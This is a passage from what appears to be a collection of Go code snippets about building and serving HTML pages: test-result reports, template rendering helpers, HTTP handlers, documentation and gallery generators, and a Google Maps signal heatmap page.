\"</div>\"\n\t\t} else if testSuite.Status == \"fail\" {\n\t\t\tpackageInfoTemplateString = \"<div class=\\\"collapsibleHeading packageCardLayout failBackgroundColor \\\">\" +\n\t\t\t\ttemplate.HTML(processedPackageTemplate.Bytes()) + \"</div>\"\n\t\t} else {\n\t\t\tpackageInfoTemplateString = \"<div class=\\\"collapsibleHeading packageCardLayout skipBackgroundColor \\\">\" +\n\t\t\t\ttemplate.HTML(processedPackageTemplate.Bytes()) + \"</div>\"\n\t\t}\n\n\t\thtmlString = htmlString + \"\\n\" + packageInfoTemplateString\n\t\ttestInfoTemplateString := template.HTML(\"\")\n\n\t\t// display testCases\n\t\tfor _, pt := range testSummary {\n\t\t\ttestHTMLTemplateString := template.HTML(\"\")\n\t\t\tif len(pt.TestCases) == 0 {\n\t\t\t\tlog.Println(\"Test run failed for \", pt.TestSuiteName, \"no testcases were executed\")\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tif pt.TestSuiteName == testSuite.TestSuiteName {\n\t\t\t\tif testSuite.FailedTests == 0 {\n\t\t\t\t\ttestHTMLTemplateString = \"<div type=\\\"button\\\" class=\\\"collapsible \\\">\" +\n\t\t\t\t\t\t\"\\n\" + \"<div class=\\\"collapsibleHeading testCardLayout successBackgroundColor \\\">\" +\n\t\t\t\t\t\t\"<div>+ {{.testName}}</div>\" + \"\\n\" + \"<div>{{.elapsedTime}}</div>\" + \"\\n\" +\n\t\t\t\t\t\t\"</div>\" + \"\\n\" +\n\t\t\t\t\t\t\"<div class=\\\"collapsibleHeadingContent\\\">\"\n\t\t\t\t} else if testSuite.FailedTests > 0 {\n\t\t\t\t\ttestHTMLTemplateString = \"<div type=\\\"button\\\" class=\\\"collapsible \\\">\" +\n\t\t\t\t\t\t\"\\n\" + \"<div class=\\\"collapsibleHeading testCardLayout failBackgroundColor \\\">\" +\n\t\t\t\t\t\t\"<div>+ {{.testName}}</div>\" + \"\\n\" + \"<div>{{.elapsedTime}}</div>\" + \"\\n\" +\n\t\t\t\t\t\t\"</div>\" + \"\\n\" +\n\t\t\t\t\t\t\"<div class=\\\"collapsibleHeadingContent\\\">\"\n\t\t\t\t} else if testSuite.SkippedTests > 0 {\n\t\t\t\t\ttestHTMLTemplateString = \"<div type=\\\"button\\\" class=\\\"collapsible \\\">\" +\n\t\t\t\t\t\t\"\\n\" + \"<div class=\\\"collapsibleHeading testCardLayout skipBackgroundColor \\\">\" +\n\t\t\t\t\t\t\"<div>+ {{.testName}}</div>\" + \"\\n\" + \"<div>{{.elapsedTime}}</div>\" + \"\\n\" +\n\t\t\t\t\t\t\"</div>\" + \"\\n\" +\n\t\t\t\t\t\t\"<div class=\\\"collapsibleHeadingContent\\\">\"\n\t\t\t\t}\n\t\t\t\ttestTemplate, err := template.New(\"Test\").Parse(string(testHTMLTemplateString))\n\t\t\t\tif err != nil {\n\t\t\t\t\tlog.Println(\"error parsing tests template: \", err)\n\t\t\t\t\tos.Exit(1)\n\t\t\t\t}\n\t\t\t\tvar processedTestTemplate bytes.Buffer\n\t\t\t\terr = testTemplate.Execute(&processedTestTemplate, map[string]string{\n\t\t\t\t\t\"testName\": \"TestCases\",\n\t\t\t\t})\n\t\t\t\tif err != nil {\n\t\t\t\t\tlog.Println(\"error applying test template: \", err)\n\t\t\t\t\tos.Exit(1)\n\t\t\t\t}\n\n\t\t\t\ttestHTMLTemplateString = template.HTML(processedTestTemplate.Bytes())\n\t\t\t\ttestCaseHTMLTemplateString := template.HTML(\"\")\n\n\t\t\t\tfor _, tC := range pt.TestCases {\n\t\t\t\t\ttestCaseHTMLTemplateString = \"<div>{{.testName}}</div>\" + \"\\n\" + \"<div>{{.elapsedTime}}m</div>\"\n\t\t\t\t\ttestCaseTemplate, err := template.New(\"testCase\").Parse(string(testCaseHTMLTemplateString))\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\tlog.Println(\"error parsing test case template: \", err)\n\t\t\t\t\t\tos.Exit(1)\n\t\t\t\t\t}\n\n\t\t\t\t\tvar processedTestCaseTemplate bytes.Buffer\n\t\t\t\t\terr = testCaseTemplate.Execute(&processedTestCaseTemplate, map[string]string{\n\t\t\t\t\t\t\"testName\": tC.TestCaseName,\n\t\t\t\t\t\t\"elapsedTime\": fmt.Sprintf(\"%f\", tC.ElapsedTime),\n\t\t\t\t\t})\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\tlog.Println(\"error applying test case template: \", err)\n\t\t\t\t\t\tos.Exit(1)\n\t\t\t\t\t}\n\n\t\t\t\t\tif tC.Status == \"passed\" {\n\t\t\t\t\t\ttestCaseHTMLTemplateString = \"<div class=\\\"testCardLayout successBackgroundColor \\\">\" + template.HTML(processedTestCaseTemplate.Bytes()) + \"</div>\"\n\n\t\t\t\t\t} else if tC.Status == \"failed\" {\n\t\t\t\t\t\ttestCaseHTMLTemplateString = \"<div class=\\\"testCardLayout failBackgroundColor \\\">\" + template.HTML(processedTestCaseTemplate.Bytes()) + \"</div>\"\n\n\t\t\t\t\t} else {\n\t\t\t\t\t\ttestCaseHTMLTemplateString = \"<div class=\\\"testCardLayout skipBackgroundColor \\\">\" + template.HTML(processedTestCaseTemplate.Bytes()) + \"</div>\"\n\t\t\t\t\t}\n\t\t\t\t\ttestHTMLTemplateString = testHTMLTemplateString + \"\\n\" + testCaseHTMLTemplateString\n\t\t\t\t}\n\t\t\t\ttestHTMLTemplateString = testHTMLTemplateString + \"\\n\" + \"</div>\" + \"\\n\" + \"</div>\"\n\t\t\t\ttestInfoTemplateString = testInfoTemplateString + \"\\n\" + testHTMLTemplateString\n\t\t\t}\n\t\t}\n\t\thtmlString = htmlString + \"\\n\" + \"<div class=\\\"collapsibleHeadingContent\\\">\\n\" + testInfoTemplateString + \"\\n\" + \"</div>\"\n\t\thtmlString = htmlString + \"\\n\" + \"</div>\"\n\t\ttemplates = append(templates, htmlString)\n\t}\n\treportTemplate := template.New(\"report-template.html\")\n\treportTemplateData, err := Asset(\"report-template.html\")\n\tif err != nil {\n\t\tlog.Println(\"error retrieving report-template.html: \", err)\n\t\tos.Exit(1)\n\t}\n\n\treport, err := reportTemplate.Parse(string(reportTemplateData))\n\tif err != nil {\n\t\tlog.Println(\"error parsing report-template.html: \", err)\n\t\tos.Exit(1)\n\t}\n\n\tvar processedTemplate bytes.Buffer\n\ttype templateData struct {\n\t\tHTMLElements []template.HTML\n\t\tFailedTests int\n\t\tPassedTests int\n\t\tSkippedTests int\n\t\tTotalTestTime string\n\t\tTestDate string\n\t}\n\n\terr = report.Execute(&processedTemplate,\n\t\t&templateData{\n\t\t\tHTMLElements: templates,\n\t\t\tFailedTests: totalFailedTests,\n\t\t\tPassedTests: totalPassedTests,\n\t\t\tSkippedTests: totalSkippedTests,\n\t\t\tTotalTestTime: totalTestTime,\n\t\t\tTestDate: testDate,\n\t\t},\n\t)\n\tif err != nil {\n\t\tlog.Println(\"error applying report-template.html: \", err)\n\t\tos.Exit(1)\n\t}\n\thtmlReport = strings.Split(fileName, \".\")[0] + \"_results.html\"\n\tbucketName = strings.Split(htmlReport, \"_\")[0] + \"-results\"\n\tfmt.Println(bucketName)\n\terr = ioutil.WriteFile(htmlReport, processedTemplate.Bytes(), 0644)\n\tif err != nil {\n\t\tlog.Println(\"error writing report.html file: \", err)\n\t\tos.Exit(1)\n\t}\n}", "func function_template_renderWeb(plugin *exec.Plugin, call otto.FunctionCall)otto.Value{\n templateContent := call.Argument(0).String()\n out, err := call.Argument(1).Export()\n options := out.(map[string]interface{})\n options = setMapDefaultIfNotExisting(options, \"PrimaryColour\", \"indigo\")\n options = setMapDefaultIfNotExisting(options, \"AccentColour\", \"amber\")\n options = setMapDefaultIfNotExisting(options, \"Title\", \"CNC\")\n options = setMapDefaultIfNotExisting(options, \"Icon\", \"wifi\")\n outputSoFar := \"\"\n\n if err != nil {\n logging.Error(\"builtin-template\", \"Options Export: \" + err.Error())\n return otto.Value{}\n }\n\n\n t, err := template.ParseFiles(\"templates/basicpage_header.tpl\", \"templates/basicpage_footer.tpl\")\n if err != nil {\n logging.Error(\"builtin-template\", \"Template load: \" + err.Error())\n return otto.Value{}\n }\n\n var output1 bytes.Buffer\n var output2 bytes.Buffer\n err = t.Lookup(\"basicpage_header.tpl\").Execute(&output1, options)\n if err != nil {\n logging.Error(\"builtin-template\", \"Execute header: \" + err.Error())\n return otto.Value{}\n }\n err = t.Lookup(\"basicpage_footer.tpl\").Execute(&output2, options)\n if err != nil {\n logging.Error(\"builtin-template\", \"Execute footer: \" + err.Error())\n return otto.Value{}\n }\n outputSoFar += output1.String()\n outputSoFar += templateContent\n outputSoFar += output2.String()\n\n\n res, _ := plugin.VM.ToValue(outputSoFar)\n return res\n}", "func ServeHTML(w http.ResponseWriter, layout string, content string, data map[string]interface{}) {\n\tvar buf bytes.Buffer\n\tbodyTmplErr := tmpl.ExecuteTemplate(&buf, content, data)\n\tif bodyTmplErr != nil {\n\t\tlog.Printf(\"|ERROR|ServeHTML bodyTmplErr ERROR %v\", bodyTmplErr)\n\t}\n\tbodyHTML := template.HTML(buf.String())\n\tif len(data) == 0 {\n\t\tdata = map[string]interface{}{}\n\t}\n\tdata[\"LayoutContent\"] = bodyHTML\n\ttmplErr := tmpl.ExecuteTemplate(w,\n\t\tlayout,\n\t\tdata)\n\n\tif tmplErr != nil {\n\t\tlog.Printf(\"|ERROR|ServeHTML LayoutTmplErr ERROR %v\", tmplErr)\n\t}\n}", "func indexHandler(res http.ResponseWriter, req *http.Request) {\n//Parsing the template\ntpl := template.Must(template.ParseFiles(\"index.html\"))\nerr := tpl.Execute(res, nil)\nlogError(err)\n}", "func addUIRoutes(router *mux.Router, fsc *frontendServerConfig, handlers *web.Handlers) {\n\t// Serve static assets (JS and CSS Webpack bundles, images, etc.).\n\t//\n\t// Note that this includes the raw HTML templates (e.g. /dist/byblame.html) with unpopulated\n\t// placeholders such as {{.Title}}. These aren't used directly by client code. We should probably\n\t// unexpose them and only serve the JS/CSS Webpack bundles from this route (and any other static\n\t// assets such as the favicon).\n\trouter.PathPrefix(\"/dist/\").Handler(http.StripPrefix(\"/dist/\", http.HandlerFunc(web.MakeResourceHandler(fsc.ResourcesPath))))\n\n\tvar templates *template.Template\n\n\tloadTemplates := func() {\n\t\ttemplates = template.Must(template.New(\"\").ParseGlob(filepath.Join(fsc.ResourcesPath, \"*.html\")))\n\t}\n\n\tloadTemplates()\n\n\tfsc.FrontendConfig.BaseRepoURL = fsc.GitRepoURL\n\tfsc.FrontendConfig.IsPublic = fsc.IsPublicView\n\n\ttemplateHandler := func(name string) http.HandlerFunc {\n\t\treturn func(w http.ResponseWriter, r *http.Request) {\n\t\t\tw.Header().Set(\"Content-Type\", \"text/html\")\n\n\t\t\t// Reload the template if we are running locally.\n\t\t\tif fsc.Local {\n\t\t\t\tloadTemplates()\n\t\t\t}\n\t\t\tif err := templates.ExecuteTemplate(w, name, fsc.FrontendConfig); err != nil {\n\t\t\t\tsklog.Errorf(\"Failed to expand template %s : %s\", name, err)\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t}\n\n\t// These routes serve the web UI.\n\trouter.HandleFunc(\"/\", templateHandler(\"byblame.html\"))\n\trouter.HandleFunc(\"/changelists\", templateHandler(\"changelists.html\"))\n\trouter.HandleFunc(\"/cluster\", templateHandler(\"cluster.html\"))\n\trouter.HandleFunc(\"/triagelog\", templateHandler(\"triagelog.html\"))\n\trouter.HandleFunc(\"/ignores\", templateHandler(\"ignorelist.html\"))\n\trouter.HandleFunc(\"/diff\", templateHandler(\"diff.html\"))\n\trouter.HandleFunc(\"/detail\", templateHandler(\"details.html\"))\n\trouter.HandleFunc(\"/details\", templateHandler(\"details.html\"))\n\trouter.HandleFunc(\"/list\", templateHandler(\"by_test_list.html\"))\n\trouter.HandleFunc(\"/help\", templateHandler(\"help.html\"))\n\trouter.HandleFunc(\"/search\", templateHandler(\"search.html\"))\n\trouter.HandleFunc(\"/cl/{system}/{id}\", handlers.ChangelistSearchRedirect)\n}", "func index(res http.ResponseWriter, req *http.Request) {\n\ttpl, err := template.ParseFiles(\"index.html\")\n\tif err != nil { // if file does not exist, give user a error\n\t\tlog.Fatalln(err) // stops program if file does not exist\n\t}\n\ttpl.Execute(res, nil) // execute the html file\n}", "func (t toc) toHTMLStr() (htmlStr string) {\n\thtmlStr = `<!DOCTYPE html>\n<html>\n<head>\n<meta charset=\"UTF-8\" />\n<title>Redis in Action: Table Of Content</title>\n</head>\n<body>\n<h1 style=\"margin-top:20px; margin-left:30px; font-size:48px;\">Redis in Action</h1>\n`\n\n\thtmlStr += \"<div style=\\\"margin-left:auto; margin-right:auto; margin-top:80px; margin-bottom:40px;\\\">\\n<ul>\\n\"\n\tcurrentLevel := 1\n\tfor _, v := range t {\n\t\tif v.level > currentLevel {\n\t\t\thtmlStr += \"<ul>\\n\"\n\t\t\tcurrentLevel = v.level\n\t\t} else if v.level < currentLevel {\n\t\t\tfor i := v.level; i < currentLevel; i++ {\n\t\t\t\thtmlStr += \"</ul>\\n\"\n\t\t\t}\n\t\t\tcurrentLevel = v.level\n\t\t}\n\n\t\thtmlStr += fmt.Sprintf(\"<li><a href=\\\"./%03d.html\\\">%s</a></li>\\n\", v.value, v.title)\n\t}\n\thtmlStr += \"</ul>\\n</div>\\n</body>\\n</html>\"\n\treturn htmlStr\n}", "func ParseFolder(i_folder string, o_folder string, depth int, list *string) {\n if (depth == 0) {\n return\n }\n\n if _, err := os.Stat(o_folder); os.IsNotExist(err) {\n fmt.Println(o_folder + \" created\")\n os.MkdirAll(o_folder, os.ModePerm)\n }\n\n\tfiles, err := ioutil.ReadDir(i_folder)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n *list += \"<ul>\" + o_folder[3:]\n for _, f := range files {\n if strings.HasSuffix(f.Name(), \".go\") {\nhtmlHeader := \"<!DOCTYPE html>\\n<html><head><title> go-doc Documentation</title>\"\n htmlHeader += \"<style> \"\n htmlHeader += \"* { font-family:helvetica; }\\n\"\n htmlHeader += \".blk {padding:10px; }\\n\"\n htmlHeader += \"h1,h2,h3 {color:darkblue;} \\n\"\n htmlHeader += \"p {font-family:\\\"Courier New\\\",monospace;} \\n\"\n htmlHeader += \"code { padding:10px; background-color:rgb(230,230,230); display:block; margin-bottom:10px; }\\n\"\n //\thtmlHeader += \". blk {padding:10px};\\n\"\n //\thtmlHeader += \". blk {padding:10px};\\n\"\n htmlHeader += \"<meta charset='UTF-8'>\"\n htmlHeader += \"</style></head>\"\n htmlFooter := \"</body></html>\"\n\n out := \"\"\n out += htmlHeader\n fmt.Println(\"Parsing:\" + f.Name())\n out += \"<!-- \" + f.Name() + \" -->\\n\"\n out += ParseFile(i_folder + \"/\" + f.Name())\n out += htmlFooter\n d1 := []byte(out)\n fmt.Println(i_folder+\"/\"+f.Name()+\".html\")\n err := ioutil.WriteFile(o_folder+\"/\"+f.Name()+\".html\", d1, 0644)\n check(err)\n *list += \"<li><a href=\"+o_folder+\"/\"+f.Name()+\".html>\"+f.Name()+\"</a></li>\"\n } else {\n sub_path := \"/\" + f.Name()\n i_folder_sub := i_folder + sub_path\n o_folder_sub := o_folder + sub_path\n fi, err := os.Stat(i_folder_sub);\n check(err)\n if fi.Mode().IsDir() {\n ParseFolder(i_folder_sub, o_folder_sub ,depth-1, list);\n }\n }\n }\n *list += \"</ul>\"\n}", "func BuildPage(htmlTemplate string, bingoBoard BingoBoard) *bytes.Buffer {\n\tvar bodyBuffer bytes.Buffer\n\tt := template.New(\"template\")\n\tvar templates = template.Must(t.Parse(htmlTemplate))\n\ttemplates.Execute(&bodyBuffer, bingoBoard)\n\treturn &bodyBuffer\n}", "func Home(response http.ResponseWriter, request *http.Request) {\n\tpage := `\n<html>\n <head></head>\n <body>\n <h1>Index of examples</h1>\n <h2>Notes</h2>\n <div>\n %s\n </div>\n <h3>Example Pages</h3>\n <ul>\n <li><a href=\"/pages/simple-page\">Simple Page Load</a> -- this is a demonstration of simply loading html pages and sending them out. No templating involved.</li>\n <li><a href=\"/compositePages/page1\">Composite Page Load</a> -- This is just like the page load, but it uses a common template to wrap the pages. In other words, content only with a common wrapper.</li>\n <li><a href=\"/simpleImportedTemplate\">Simple Imported Template</a> -- a template imported from an HTML file.</li>\n <li><a href=\"/complexImportedTemplate\">Complex Imported Template</a> -- a template imported from an HTML file with lots of variables.</li>\n <li><a href=\"/fullyTemplatedTemplate\">Fully Templated Template</a> -- a template that incorporates loops, other template files, variables, and loops. Also includes css, images, and js files.</li>\n </ul>\n <h3>Utility Functions</h3>\n <ul>\n <li><a href=\"/images/modemConvo.jpg\">Image load example</a> -- Example of loading an images.</li>\n <li><a href=\"/js/alert.js\">Javascript load example</a> -- Example of loading javascipt.</li>\n <li><a href=\"/css/css1.css\">CSS load example</a> -- Example of loading css.</li>\n </ul>\n </body>\n</html>`\n\n\tf, err := os.Open(\".\")\n\n\tif err != nil {\n\t\tfmt.Println(err)\n\t}\n\tdefer f.Close()\n\n\tfileInfo, _ := f.Stat()\n\n\ttestString := fileInfo.IsDir()\n\n\tfmt.Fprintf(response, page, testString)\n}", "func pages(response http.ResponseWriter, request *http.Request) {\n\tpagesFolder := \"sitehelpers/simple-res/templates/pages/\"\n\tpage := mux.Vars(request)[\"page\"]\n\n\tfilename := pagesFolder + page + \".html\"\n\n\tif exists(filename) {\n\t\thtml, _ := ioutil.ReadFile(filename)\n\t\tfmt.Fprintf(response, string(html))\n\t} else {\n\t\tdo404(response)\n\t}\n}", "func main() {\n\tout := TreeNode(txt2web.Generate(filenames(os.Args[1:]...)))\n\n\tfor tree := range out {\n\t\tfmt.Println(tree)\n\t}\n}", "func (dt *Slick) HTMLTemplate() string {\n\treturn htmlTemplate\n}", "func renderDagHTML(h *rpctest.Harness) (string, error) {\n\tresult, err := h.Node.RenderDag()\n\tif err != nil {\n\t\treturn \"\", fmt.Errorf(\"failed to render dag: %s\", err)\n\t}\n\n\tsvg, err := soterutil.DotToSvg([]byte(result.Dot))\n\tif err != nil {\n\t\treturn \"\", fmt.Errorf(\"failed to convert dot to svg: %s\", err)\n\t}\n\n\tsvgEmbed, err := soterutil.StripSvgXmlDecl(svg)\n\tif err != nil {\n\t\treturn \"\", fmt.Errorf(\"failed to strip svg xml declaration tag: %s\", err)\n\t}\n\n\thtml, err := soterutil.RenderSvgHTML(svgEmbed, \"dag\")\n\n\tfh, err := ioutil.TempFile(\"\", \"dag_*.html\")\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\terr = save(html, fh)\n\tif err != nil {\n\t\treturn fh.Name(), err\n\t}\n\n\treturn fh.Name(), err\n}", "func (self templateEngine) genBoard(prefix, frontend, newsgroup, outdir string, db Database) {\n // get the board model\n board := self.obtainBoard(prefix, frontend, newsgroup, db)\n // update the entire board model\n board = board.UpdateAll(db)\n // save the model\n self.groups[newsgroup] = board\n updateLinkCache()\n \n pages := len(board)\n for page := 0 ; page < pages ; page ++ {\n outfile := filepath.Join(outdir, fmt.Sprintf(\"%s-%d.html\", newsgroup, page))\n wr, err := OpenFileWriter(outfile)\n if err == nil {\n board[page].RenderTo(wr)\n wr.Close()\n log.Println(\"wrote file\", outfile)\n } else {\n log.Println(\"error generating board page\", page, \"for\", newsgroup, err)\n }\n }\n}", "func LaunchHTML() {\n\thttp.Handle(\"/\", http.FileServer(http.Dir(\"./\")))\n\thttp.ListenAndServe(\":80\", nil)\n}", "func (sw *Swgen) Run() error {\n\tif err := os.MkdirAll(sw.Target, os.ModePerm); err != nil {\n\t\treturn err\n\t}\n\n\ttree, err := sw.Scan(sw.Source)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tmetadata := &Metadata{}\n\tcontent := template.HTML(\"\")\n\treturn sw.renderAll(tree, metadata, content)\n}", "func main(){\n\tcfg := setup()\n\n\t// Just output the template.\n\ttemplate, _ := ioutil.ReadAll(cfg.Template)\n\tfmt.Println(string(template))\n}", "func main() {\n\t// param\n\tif len(os.Args) < 2 {\n\t\tprintln(\"VERSION\", VERSION, \": call\", filepath.Base(os.Args[0]), \"<root path>\")\n\t\tos.Exit(1)\n\t}\n\tvar root = os.Args[1]\n\n\t// check changes\n\thash := changeHash(root)\n\tb, err := ioutil.ReadFile(filepath.Join(root, outDivs))\n\tif err == nil && strings.Contains(string(b), hash) {\n\t\tos.Exit(0) // no changes -> exit\n\t}\n\n\t// scan root\n\trows := new(strings.Builder)\n\tdivs := new(strings.Builder)\n\tfor _, m := range Scan(root) {\n\t\trows.WriteString(m.TableRow(maxImageSize))\n\t\tdivs.WriteString(m.Div(maxImageSize))\n\t}\n\n\t// ----------------------------------------------\n\n\t// read template\n\tb, err = ioutil.ReadFile(templateRows)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\t// replace\n\thtml := strings.ReplaceAll(string(b), templateHash, hash)\n\thtml = strings.ReplaceAll(html, insertRows, rows.String())\n\t// write file\n\terr = ioutil.WriteFile(filepath.Join(root, outRows), []byte(html), 0600)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\t// ----------------------------------------------\n\n\t// read template\n\tb, err = ioutil.ReadFile(templateDivs)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\t// replace\n\thtml = strings.ReplaceAll(string(b), templateHash, hash)\n\thtml = strings.ReplaceAll(html, insertDivs, divs.String())\n\t// write file\n\terr = ioutil.WriteFile(filepath.Join(root, outDivs), []byte(html), 0600)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n}", "func process2(w http.ResponseWriter, r *http.Request) {\n\tt, _ := template.ParseFiles(mPath + \"test02/src/test/tmpl.html\")\n\tt.Execute(w, \"Hello Workd!\")\n\n}", "func (script Script) RenderHTML() {\n\tsymbols := []string{}\n\ttemplateHTML := `\n<!DOCTYPE html>\n<html>\n <head>\n <title>Writing System</title>\n <style type=\"text/css\">\n body, html { font-size: 28px; }\n div.container { display: flex; flex-wrap: wrap; width: 1600px; margin: 1rem auto; }\n div.cell { width: 100px; height: 100px; margin: 1rem; text-align: center; font-weight: 700; }\n div.cell > img { display: block; }\n </style>\n </head>\n <body>\n\t\t<div class=\"container\">\n\t\t\t{{range $index, $element := .}}\n <div class=\"cell\">\n <img src=\"{{ $element }}.png\">\n <p>{{ $element }}</p>\n </div>\n {{end}}\n </div>\n </body>\n</html>\n`\n\n\twriter, err := os.Create(\"./output/index.html\")\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\treturn\n\t}\n\n\tt, err := template.New(\"htmlIndex\").Parse(templateHTML)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\treturn\n\t}\n\n\tfor _, g := range script.Glyphs {\n\t\tsymbols = append(symbols, g.Representation)\n\t}\n\n\terr = t.Execute(writer, symbols)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\treturn\n\t}\n\n\tdefer writer.Close()\n}", "func index(w http.ResponseWriter, r *http.Request) {\n\tdata := page{Title: \"School Database\", Header: \"Welcome, please select an option\"}\n\ttemplateInit(w, \"index.html\", data)\n\n}", "func init() {\n\t// var err error\n\t// tmpl, err = template.ParseFiles(\"templates/hello.gohtml\")\n\t// if err != nil {\n\t// \tpanic(err)\n\t// }\n\ttmpl = template.Must(template.ParseGlob(\"templates/*.gohtml\"))\n\n}", "func rootPage(w http.ResponseWriter, r *http.Request) {\n\thttpHTML(w, \"hello, world\")\n}", "func getHTMLFromTemplate(path string, data HelloMessage) string {\n\ttmpl := template.Must(template.ParseFiles(path))\n\tvar templateString bytes.Buffer\n\ttmpl.Execute(&templateString, data)\n\treturn templateString.String()\n}", "func HTMLString(data interface{}, viewName string) string {\n\tvar html bytes.Buffer\n\ttemplateName := viewName\n\tt, err := Jet.GetTemplate(templateName)\n\tif err != nil {\n\t\tlog.Println(\"Failed to get tempalte \")\n\t}\n\tvars := make(jet.VarMap)\n\tif err = t.Execute(&html, vars, data); err != nil {\n\t\tlog.Println(\"Failed to execute view tepmlate \")\n\t}\n\treturn html.String()\n}", "func (a Generator) Run(root string, data makr.Data) error {\n\tg := makr.New()\n\n\tif a.AsAPI {\n\t\tdefer os.RemoveAll(filepath.Join(a.Root, \"templates\"))\n\t\tdefer os.RemoveAll(filepath.Join(a.Root, \"locales\"))\n\t\tdefer os.RemoveAll(filepath.Join(a.Root, \"public\"))\n\t}\n\tif a.Force {\n\t\tos.RemoveAll(a.Root)\n\t}\n\n\tg.Add(makr.NewCommand(makr.GoGet(\"golang.org/x/tools/cmd/goimports\", \"-u\")))\n\tif a.WithDep {\n\t\tg.Add(makr.NewCommand(makr.GoGet(\"github.com/golang/dep/cmd/dep\", \"-u\")))\n\t}\n\n\tfiles, err := generators.FindByBox(packr.NewBox(\"../newapp/templates\"))\n\tif err != nil {\n\t\treturn errors.WithStack(err)\n\t}\n\n\tfor _, f := range files {\n\t\tif !a.AsAPI {\n\t\t\tg.Add(makr.NewFile(f.WritePath, f.Body))\n\t\t\tcontinue\n\t\t}\n\n\t\tif strings.Contains(f.WritePath, \"locales\") || strings.Contains(f.WritePath, \"templates\") || strings.Contains(f.WritePath, \"public\") {\n\t\t\tcontinue\n\t\t}\n\n\t\tg.Add(makr.NewFile(f.WritePath, f.Body))\n\t}\n\n\tdata[\"name\"] = a.Name\n\tif err := refresh.Run(root, data); err != nil {\n\t\treturn errors.WithStack(err)\n\t}\n\n\ta.setupCI(g, data)\n\n\tif err := a.setupWebpack(root, data); err != nil {\n\t\treturn errors.WithStack(err)\n\t}\n\n\tif err := a.setupPop(root, data); err != nil {\n\t\treturn errors.WithStack(err)\n\t}\n\n\tif err := a.setupDocker(root, data); err != nil {\n\t\treturn errors.WithStack(err)\n\t}\n\n\tg.Add(makr.NewCommand(a.goGet()))\n\n\tg.Add(makr.Func{\n\t\tRunner: func(root string, data makr.Data) error {\n\t\t\tg.Fmt(root)\n\t\t\treturn nil\n\t\t},\n\t})\n\n\ta.setupVCS(g)\n\n\tdata[\"opts\"] = a\n\treturn g.Run(root, data)\n}", "func creaHTMLEtiquetas(etiquetas []string) string {\n\thtmle := ``\n\tfor i := 0; i < len(etiquetas); i++ {\n\t\thtmle += `<tr>\n\t\t\t\t<td><input type=\"hidden\" class=\"form-control\" value=\"\"><input type=\"text\" class=\"form-control\" name=\"Etiquetas\" value=\"` + etiquetas[i] + `\" readonly></td>\n\t\t\t\t<td><button type=\"button\" class=\"btn btn-danger deleteButton\"><span class=\"glyphicon glyphicon-trash btn-xs\"></span></button></td>\n\t\t\t\t</tr>`\n\t}\n\treturn htmle\n}", "func populateTemplate(points *Points, apikey *string) []byte {\n\t// func populateTemplate(points *Points, apikey *string) []byte {\n\tvar page Page\n\tvar convexData string\n\tvar heatmap string\n\tvar driveData string\n\thigh, low := 0, 0\n\tif apikey != nil {\n\t\tpage.Apikey = apikey\n\t} else {\n\t\tpage.Apikey = nil\n\t}\n\tvar tplBuffer bytes.Buffer\n\tconvexPoints := findConvexHull(*points)\n\tfor _, point := range convexPoints {\n\t\tconvexData += fmt.Sprintf(\"(new google.maps.LatLng(%g, %g)), \", point.Y, point.X)\n\t}\n\tfor _, point := range *points {\n\t\theatmap += fmt.Sprintf(\"{location: new google.maps.LatLng(%g, %g), weight: %f}, \", point.Y, point.X, (float64(point.Dbm)/10.0)+9.0)\n\t\tsigCheck(&high, &low, point.Dbm)\n\t}\n\tfor _, point := range *points {\n\t\tdriveData += fmt.Sprintf(\"(new google.maps.LatLng(%g, %g)), \", point.Y, point.X)\n\t}\n\tpage.Lat = (*points)[0].Y\n\tpage.Lng = (*points)[0].X\n\tpage.PathLength = len(*points)\n\tpage.ConvexHull = template.JS(\"[\" + convexData[:len(convexData)-2] + \"]\")\n\tpage.Heatmap = template.JS(\"[\" + heatmap[:len(heatmap)-2] + \"]\")\n\tpage.Drive = template.JS(\"[\" + driveData[:len(driveData)-2] + \"]\")\n\tpage.HighDB = template.JS(fmt.Sprintf(\"%v\", high))\n\tpage.LowDB = template.JS(fmt.Sprintf(\"%v\", low))\n\tt, err := template.New(\"webpage\").Parse(tpl)\n\tcheckError(err)\n\terr = t.Execute(&tplBuffer, page)\n\tcheckError(err)\n\treturn tplBuffer.Bytes()\n}", "func request(w http.ResponseWriter, r *http.Request) {\n\n\tt, _ := template.ParseFiles(\"head.html\")\n\tt.Execute(w, nil)\n\tu, _ := template.ParseFiles(\"footer.html\")\n\tu.Execute(w, nil)\n}", "func (app * application) createSnippetForm(w http.ResponseWriter, r *http.Request){\n\tapp.render(w, r, \"create.page.tmpl\",nil)\n}", "func loadTmpl(tmp string) (string, error) {\n\tcontent, err := ioutil.ReadFile(tmp)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\tbodyPretty := goutil.PrepHtmlForJson(string(content), false)\n\treturn bodyPretty, nil\n}", "func renderWelcomePage(w http.ResponseWriter, r *http.Request, status *dpstatus) {\n welcomeTemplate.ExecuteTemplate(w, \"WelcomePage\",\n struct {\n Style template.HTML\n Statusok bool\n Giterr error\n Wd, Prefix string\n } { servicestyle, status.ok, status.giterror, status.workingdir, \"/\"+status.usersets.controlprefix })\n}" ]
